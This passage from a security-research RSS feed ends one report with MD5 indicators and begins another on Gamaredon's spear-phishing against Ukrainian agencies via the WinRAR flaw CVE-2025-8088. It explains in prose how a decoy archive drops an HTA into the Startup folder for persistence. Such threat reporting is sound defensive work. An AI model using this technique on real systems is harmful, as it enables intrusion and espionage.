23px;text-decoration: inherit;"><span leaf="">附录 IOC</span></span></strong></span></p></div></div><div data-role="paragraph" style="margin-top: 24px;margin-bottom: 24px;"><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="">MD5</span></span></strong></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">faa9dec02bad43b1af68a4194dea8762</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">273af5e2e0130baee7d3b55081be5ad5</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">41df3b66ebcfb6e4d4d581d678299041</span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer"><div data-role="paragraph"><div data-role="outer" label="edit by 135editor"><div data-role="paragraph" style="margin-top: 24px;margin-bottom: 24px;" data-pm-slice="6 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer" label="edit by 135editor"><div data-role="title" data-tools="135编辑器" data-id="85638"><div style="margin-top: 2em;margin-right: auto;margin-left: auto;padding-top: 0.5em;padding-bottom: 0.5em;border-right: none;border-bottom: none;border-left: none;border-top: 1px solid rgb(204, 204, 204);font-size: 1em;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);font-family: inherit;"><p style="margin-top: -1.2em;text-align: center;border-width: initial;border-style: none;border-color: initial;line-height: 1.4;"><span style="font-size: 16px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 16px;background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);padding: 8px 23px;text-decoration: inherit;"><span leaf="">参考</span></span></strong></span></p></div></div></div><p><span style="font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;text-indent: -21pt;letter-spacing: 0.034em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">[1]</span><span leaf=""><a href="https://research.hisolutions.com/2025/04/rolling-in-the-deepweb-lazarus-tsunami/" target="_blank">https://research.hisolutions.com/2025/04/rolling-in-the-deepweb-lazarus-tsunami/</a></span></span></p></div></div></div></div><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com"><div data-tools="135编辑器" data-id="98507" style="color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><div style="margin: 10px auto;text-align: center;line-height: 1.5em;"><div style="padding-bottom: 3px;display: flex;justify-content: center;align-items: center;border-bottom: 1px solid rgb(190, 25, 31);"><p data-brushtype="text" style="padding-right: 8px;padding-left: 8px;font-size: 16px;letter-spacing: 1.5px;transform: rotate(0deg);"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span leaf="">团队介绍</span></strong></span></p></div></div><p style="padding-top: 4px;padding-bottom: 4px;font-size: 12px;letter-spacing: 1.5px;line-height: 1.5em;text-align: center;transform: rotate(0deg);"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">TEAM INTRODUCTION</span></span></p></div><div data-role="paragraph" style="color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><p style="min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="color: rgb(190, 25, 31);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 15px;color: rgb(190, 25, 31);"><span leaf="">360</span></span></strong><strong><span style="font-size: 15px;color: rgb(190, 25, 31);"><span leaf="">高级威胁研究院</span></span></strong></span></p><p style="min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="color: rgb(136, 136, 136);font-size: 14px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">360高级威胁研究院是360数字安全集团的核心能力支持部门，由360资深安全专家组成，专注于高级威胁的发现、防御、处置和研究，曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击，独家披露多个国家级APT组织的高级行动，赢得业内外的广泛认可，为360保障国家网络安全提供有力支撑。</span></span></p></div></div></div></div></div></div></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="2247507693">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=03ffa0e0&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyMjk4NzExMA%3D%3D%26mid%3D2247507693%26idx%3D1%26sn%3De73e1cca5af2ee80c3037daa1dbd2ab1">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 12 Dec 2025 17:30:00 +0800</pubDate>
    </item>
    <item>
      <title>APT-C-53（Gamaredon）利用CVE-2025-8088进行网络钓鱼攻击活动</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247507617&amp;idx=1&amp;sn=9a64ed18ff9ef62dc3e66b76b1ac6a8b</link>
      <description>360高级威胁研究院近期监测数据显示，Gamaredon组织正在利用CVE-2025-8088（WinRAR路径遍历漏洞）进行鱼叉式网络钓鱼攻击。</description>
      <content:encoded><![CDATA[<p>
原创 <span>高级威胁研究院</span> <span>2025-12-05 17:30</span> <span style="display: inline-block;">北京</span>
</p>




<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=d2c32fc4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F6CNEHNicic4PrLNn3RWeBMDibUGFpRtwjWwRTwB0iaPmJENRWriaggzosQKZPEwo8IVadqicLKPQZasPTtjJrkr29qGg%2F0%3Fwx_fmt%3Djpeg"/></p>

<p>360高级威胁研究院近期监测数据显示，Gamaredon组织正在利用CVE-2025-8088（WinRAR路径遍历漏洞）进行鱼叉式网络钓鱼攻击。</p>

<div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-tools="135编辑器" data-id="102539"><div style="margin: 10px auto;text-align: left;"><div style="background: #f2f2f2;"><div style="padding: 1em;" data-pm-slice="7 6 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-tools&#34;:&#34;135编辑器&#34;,&#34;data-id&#34;:&#34;102539&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin: 10px auto;text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background: #f2f2f2;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="display: flex;justify-content:  space-between;align-items: flex-end;" hm_fix="312:231"><div style="display: flex;justify-content: space-between;flex-direction: column;align-items: flex-start;border-left: 4px solid rgb(190, 25, 31);"><p data-brushtype="text" style="font-size: 16px;letter-spacing: 1.5px;padding-right: 0em;padding-bottom: 3px;padding-left: 0em;color: rgb(50, 40, 40);margin-left: 12px;border-bottom: 1px solid rgb(190, 25, 31);font-style: italic;"><span style="font-size: 18px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span leaf="">APT-C-53</span></strong></span></p><p data-brushtype="text" style="letter-spacing: 1.5px;padding-top: 4px;padding-right: 0em;padding-left: 0em;color: rgb(190, 25, 31);font-style: italic;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 18px;"><strong><span leaf="">Gamaredon</span></strong></span></span></p></div></div><div data-autoskip="1" style="text-align: justify;line-height:1.75em;letter-spacing: 1.5px;font-size:14px;color:#000;margin-top: 20px;"><p style="text-align: justify;vertical-align: inherit;color: rgb(51, 51, 51);text-indent: 28px;font-family: 等线;margin-top: 8px;margin-bottom: 8px;line-height: 1.6em;"><span style="line-height: 18.4px;font-size: 17px;color: rgb(33, 33, 34);letter-spacing: 1.5px;text-indent: 28px;background-color: rgb(245, 245, 244);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="line-height: 18.4px;font-size: 17px;color: rgb(33, 33, 34);letter-spacing: 1.5px;text-indent: 28px;background-color: rgb(245, 245, 244);"><span leaf="">APT-C-53（Gamaredon），又名Primitive Bear、Winterflounder、BlueAlpha，是一个自2013年起活跃的俄罗斯政府支持的高级持续威胁（APT）组织。该组织长期针对乌克兰政府、军事等重点单位进行攻击，最早攻击活动可追溯至2013年，主要目的为窃取情报、进行间谍活动等。该组织十分活跃，即使近几年不断被安全厂商披露其攻击活动，但也未曾阻止APT-C-53停止行动潜伏，反而有越演越烈的趋势。</span></span></span></p></div></div></div></div></div></div></div><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf=""> 一、概述 </span></span></strong></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">360高级威胁研究院近期监测数据显示，Gamaredon组织正在利用CVE-2025-8088（WinRAR路径遍历漏洞）进行鱼叉式网络钓鱼攻击。该组织在2025年持续针对乌克兰政府职能部门开展高密度情报窃取活动，本报告据此展开专项分析，建议相关机构及人员强化安全防护意识，加强涉密情报与用户数据的加密保护及访问控制，有效防范恶意攻击导致的信息泄露风险。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf=""> 二、攻击链分析 </span></span></strong></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023958" class="rich_pages wxw-img" data-ratio="0.5502890173410404" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=ab1d42d7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PrLNn3RWeBMDibUGFpRtwjWwWiaez8A9QY3U88j7tzRCicosWQDPiczMsxej79n3iaXffx1Z8bqzYia60Rg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2.1. </span><span leaf="">初始访问与漏洞利用(CVE-2025-8088)</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">初始访问向量是通过鱼叉式钓鱼邮件投递的特制RAR压缩包文件。该攻击利用了编号为CVE-2025-8088的目录遍历漏洞。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">该漏洞的技术原理在于：归档程序允许文件中包含替代数据流(Alternate Data Streams, ADS)，而ADS 可被用于携带任意恶意载荷。当用户执行提取归档操作，或直接从归档中打开文件时，ADS中隐藏的数据将被写入到攻击者指定的任意系统目录，从而触发目录遍历攻击。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">攻击者精心构造了该归档文件，使其在文件列表中（如图1所示）表面上只包含一个良性的诱饵文件。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023959" class="rich_pages wxw-img" data-ratio="0.130635838150289" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=9dd4af0f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PrLNn3RWeBMDibUGFpRtwjWwLzeeaa9tgKbkdaro2A1bz7cVzE3x5MIObBFdCibRea6icnhLl8fFHKmQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;font-weight: bold;">图1.压缩包文件列表</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">一旦受害者尝试解压此诱饵RAR文件，漏洞即被触发，导致以下文件被静默创建到指定路径：%userprofile%\appdata\roaming\microsoft\windows\start menu\programs\startup\xxx.HTA</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">通过此手法，归属于Gamaredon组织的HTA恶意文件被直接部署到Windows启动目录，从而在用户登陆时执行，实现持久化。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">（由于未能精确匹配特定环境变量，未能成功复现完整的利用链。因此，本报告中描述的后续攻击活动，均基于从受害设备中实际捕获的样本和日志分析得出。）</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 